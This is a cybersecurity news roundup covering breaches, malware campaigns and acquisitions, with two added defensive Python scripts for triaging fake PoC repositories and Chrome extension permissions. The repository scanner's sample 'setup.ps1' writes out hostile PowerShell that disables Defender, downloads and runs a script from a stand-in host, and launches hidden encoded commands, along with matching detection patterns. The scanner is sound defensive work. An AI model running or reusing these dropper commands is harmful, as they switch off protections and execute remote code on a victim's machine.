Cybersecurity News: ServiceNow acquires cybersecurity startup Armis, MacSync Stealer adopts quieter installation, Nissan customer data stolen in Red Hat raid

In today’s cybersecurity news…

ServiceNow to acquire cybersecurity startup Armis

ServiceNow agreed to acquire cybersecurity company Armis for $7.75 billion, marking the largest acquisition in ServiceNow’s history. Armis specializes in cyber exposure management and cybersecurity for IT systems, operational technology, medical devices, and other connected assets. Armis’ team (roughly 950 employees) will join ServiceNow after the deal closes. (The Wall Street Journal)

MacSync Stealer adopts quieter installation

Jamf Threat Labs identified a reworked MacSync Stealer variant for macOS that poses as a legitimate Swift app, signed with an Apple-issued developer certificate and notarized, and uses a quieter, largely automated installation that drops the user-interaction tricks of earlier versions. The malware is distributed via a disk image posing as a messaging-app installer, silently downloads and executes an encoded second-stage payload in memory, and leaves minimal forensic traces. Jamf reported the developer certificate to Apple, which has since revoked it. (Infosecurity Magazine)

SEC sues crypto firms for defrauding investors

The SEC sued seven crypto-related firms, accusing each of running WhatsApp-based “investment clubs” that used deepfake videos, fake professors, and AI-generated trading tips to defraud retail investors out of more than $14 million. Victims were steered to bogus crypto platforms and fake security token offerings, then blocked from withdrawing funds unless they paid additional fees, with money routed to overseas bank accounts and crypto wallets in Southeast Asia. The SEC is seeking civil penalties, as part of a broader U.S. crackdown on large-scale scam operations linked to the region. (The Record)

Nissan customer data stolen in Red Hat raid

Nissan disclosed that around 21,000 customers in Japan had personal data exposed after attackers accessed a Red Hat–managed GitLab server used by a former Nissan dealer. The stolen information includes names, addresses, phone numbers, and partial email addresses, though no payment data appears to have been taken. Red Hat detected the breach in late September and alerted Nissan in early October. The incident is Nissan’s third major data breach in three years. (The Register)

Huge thanks to our sponsor, ThreatLocker

Want real Zero Trust training? Zero Trust World 2026 delivers hands-on labs and workshops that show CISOs exactly how to implement and maintain Zero Trust in real environments. Join us March 4–6 in Orlando, plus a live CISO Series episode on March 6. Get $200 off with ZTWCISO26 at ztw.com.

n8n flaw could allow arbitrary code execution

A critical vulnerability in the n8n workflow automation platform could let authenticated attackers execute arbitrary code and fully compromise affected instances. The flaw affects n8n’s expression evaluation system and potentially exposes data, workflows, and underlying systems, with more than 100,000 internet-facing instances potentially vulnerable as of December 22nd. Users are urged to upgrade immediately. (Security Affairs)

WebRAT spread through fake GitHub exploits

WebRAT malware is being distributed via malicious GitHub repositories posing as proof-of-concept exploits for recently disclosed vulnerabilities, including Windows and WordPress flaws. According to Kaspersky researchers, at least 15 repositories used AI-generated vulnerability descriptions to trick users into running a dropper that disables Windows Defender and installs the backdoor, which can steal credentials and crypto wallet data and spy via webcams. All identified repositories have since been taken down. (BleepingComputer)
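The practical lesson of the WebRAT campaign is to triage a "PoC" checkout before running anything in it. The script below is an added example, not Kaspersky's detection logic or WebRAT's actual indicators: it scans a cloned repository for dropper traits the story mentions (Defender tampering, encoded PowerShell, download-and-execute) and returns a verdict. The indicator regexes, file list and sample repo contents are constructed assumptions for illustration.

```python
"""Pre-execution triage of a 'proof-of-concept exploit' repository.

Added example, not Kaspersky's detection logic. Before running a PoC pulled
from an unfamiliar GitHub repo, scan the checkout for dropper behaviour
(defender tampering, encoded PowerShell, download-and-execute) instead of
trusting an AI-polished README. The indicator patterns are generic
assumptions, not the WebRAT indicators of compromise.
"""
import re
from dataclasses import dataclass
from pathlib import Path

INDICATORS = {
    "defender_disable": re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion\w+", re.I),
    "encoded_powershell": re.compile(
        r"powershell(\.exe)?[^\n]*\s-(enc|encodedcommand)\b", re.I),
    "download_exec": re.compile(
        r"(IEX|Invoke-Expression)[^\n]*(DownloadString|Invoke-WebRequest|\biwr\b)"
        r"|(DownloadString|Invoke-WebRequest|\biwr\b)[^\n]*(IEX|Invoke-Expression)", re.I),
    "base64_decode": re.compile(r"FromBase64String|certutil(\.exe)?\s+-decode", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
}
# File types worth reading as text when walking a real checkout (assumed list).
TEXT_SUFFIXES = {".ps1", ".bat", ".cmd", ".vbs", ".js", ".py", ".sh", ".md", ".txt", ""}


@dataclass(frozen=True)
class Finding:
    path: str
    indicator: str
    line_no: int
    line: str


def scan_text(path, text):
    """Return one Finding per (line, indicator) hit in a single file's text."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.append(Finding(path, name, n, line.strip()[:120]))
    return hits


def scan_repo(files):
    """files: mapping of relative path -> text. Use load_checkout() for a real clone."""
    hits = []
    for path, text in files.items():
        hits.extend(scan_text(path, text))
    return hits


def load_checkout(root):
    """Read the text files of a cloned repo into the mapping scan_repo() expects."""
    root = Path(root)
    return {str(p.relative_to(root)): p.read_text(encoding="utf-8", errors="ignore")
            for p in root.rglob("*")
            if p.is_file() and p.suffix.lower() in TEXT_SUFFIXES and ".git" not in p.parts}


def verdict(hits):
    """Tampering with the AV is a hard stop; two independent dropper traits also block."""
    names = {h.indicator for h in hits}
    if names & {"defender_disable", "defender_exclusion"} or len(names) >= 2:
        return "block"
    return "review" if names else "allow"


# Constructed sample: the README sells a WordPress PoC, but setup.ps1 is a Windows dropper.
SAMPLE_REPO = {
    "README.md": "# RCE PoC for a WordPress plugin\nRun setup.ps1 first to install dependencies.\n",
    "setup.ps1": (
        "Set-MpPreference -DisableRealtimeMonitoring $true\n"
        "Add-MpPreference -ExclusionPath $env:TEMP\n"
        "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s2.ps1')\n"
        "Start-Process powershell -ArgumentList '-WindowStyle Hidden -enc JABjAGwAaQBlAG4AdAA='\n"
    ),
    "exploit.py": "import requests\n\ndef run(target):\n    return requests.get(target + '/wp-json/').status_code\n",
}

if __name__ == "__main__":
    hits = scan_repo(SAMPLE_REPO)
    for h in hits:
        print(f"{h.path}:{h.line_no} [{h.indicator}] {h.line}")
    print("verdict:", verdict(hits))
```

The mismatch the scanner surfaces is the one that matters here: a repository advertised as a WordPress or web exploit has no business shipping a Windows setup script that touches Defender. Run `scan_repo(load_checkout("path/to/clone"))` on the real checkout and treat anything but "allow" as a reason to read the scripts line by line, ideally in a disposable VM.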

US disrupts bank account takeover operation

The U.S. Justice Department seized the domain web3adspanels.org, which officials say was used as a control panel for a bank account takeover operation that stole millions from Americans via fraudulent search ads impersonating major banks. The FBI identified at least 19 victims with attempted losses of about $28 million and confirmed losses of roughly $14.6 million, and says the database hosted credentials for thousands of victims. Bank account takeover fraud has generated more than $262 million in reported losses this year. (The Record)

Chrome extensions caught stealing credentials

Two malicious Chrome extensions called Phantom Shuttle posed as a network speed test and VPN service while secretly intercepting traffic and stealing credentials from more than 170 websites, according to Socket Security. Researchers found the extensions routed selected traffic through attacker-controlled proxies, exfiltrating plaintext emails and passwords, payment data, developer secrets, and browsing activity while maintaining a persistent connection to a command-and-control server. The operation has run for years and likely originated in China. (The Hacker News)
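What let Phantom Shuttle sit in the credential path is a permission set no speed test or VPN helper needs in combination: the proxy and webRequest APIs together with access to every site. The script below is an added example, not Socket Security's tooling or the real extensions' manifests: it triages extension manifests by that combination and can be pointed at an installed Chrome profile. The risk weights, the sample manifests and the Linux profile path are assumptions for illustration.

```python
"""Permission triage for installed Chrome extensions.

Added example, not Socket Security's research tooling. An extension that asks
for the proxy and webRequest APIs plus host access to every site is in the
position Phantom Shuttle used: it can route chosen traffic through a proxy the
author controls and read credentials in transit. Risk weights, the sample
manifests and the Linux profile path below are assumptions for illustration.
"""
import json
from pathlib import Path

# Permissions that let an extension redirect or read traffic (assumed weights).
TRAFFIC_PERMS = {
    "proxy": "can set a proxy for every request the browser makes",
    "webRequest": "can observe request and response headers of matching sites",
    "webRequestBlocking": "can modify or redirect requests before they are sent",
    "debugger": "can attach to tabs and read everything, including form posts",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def host_patterns(manifest):
    """Hosts live in host_permissions (MV3) or are mixed into permissions (MV2)."""
    perms = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    return {p for p in perms if "://" in p or p == "<all_urls>"}


def triage(manifest):
    """Return (level, reasons) for one parsed manifest.json."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    hosts = host_patterns(manifest)
    reasons = [f"{p}: {why}" for p, why in TRAFFIC_PERMS.items() if p in perms]
    broad = bool(hosts & BROAD_HOSTS)
    if broad:
        reasons.append("host access to every site")
    if reasons and broad and len(reasons) > 1:
        level = "high"    # traffic control on every site: a credential-theft position
    elif reasons:
        level = "medium"  # either a traffic API or broad hosts, not both
    else:
        level = "low"
    return level, reasons


def load_installed(extensions_dir):
    """Yield (extension id, version, manifest) from a Chrome profile.

    Assumed default Linux layout:
    ~/.config/google-chrome/Default/Extensions/<id>/<version>/manifest.json
    """
    for mf in Path(extensions_dir).glob("*/*/manifest.json"):
        yield mf.parent.parent.name, mf.parent.name, json.loads(mf.read_text(encoding="utf-8"))


# Constructed manifests, not the real Phantom Shuttle ones.
SPEEDTEST_MANIFEST = {
    "manifest_version": 3,
    "name": "Network Speed Test",
    "permissions": ["proxy", "webRequest", "storage", "alarms"],
    "host_permissions": ["<all_urls>"],
}
BENIGN_MANIFEST = {
    "manifest_version": 3,
    "name": "Example Theme Switcher",
    "permissions": ["storage"],
    "host_permissions": ["https://example.org/*"],
}

if __name__ == "__main__":
    for m in (SPEEDTEST_MANIFEST, BENIGN_MANIFEST):
        level, reasons = triage(m)
        print(f"{m['name']!r}: {level}")
        for r in reasons:
            print("   -", r)
    # On a workstation (path is an assumption):
    # for ext_id, version, m in load_installed(Path.home() / ".config/google-chrome/Default/Extensions"):
    #     print(ext_id, version, triage(m)[0])
```

A "high" result is not proof of malice, since a legitimate corporate VPN extension needs the same APIs, but it is the set of extensions whose publisher, update history and network destinations deserve a look before they stay on a machine that logs into anything sensitive.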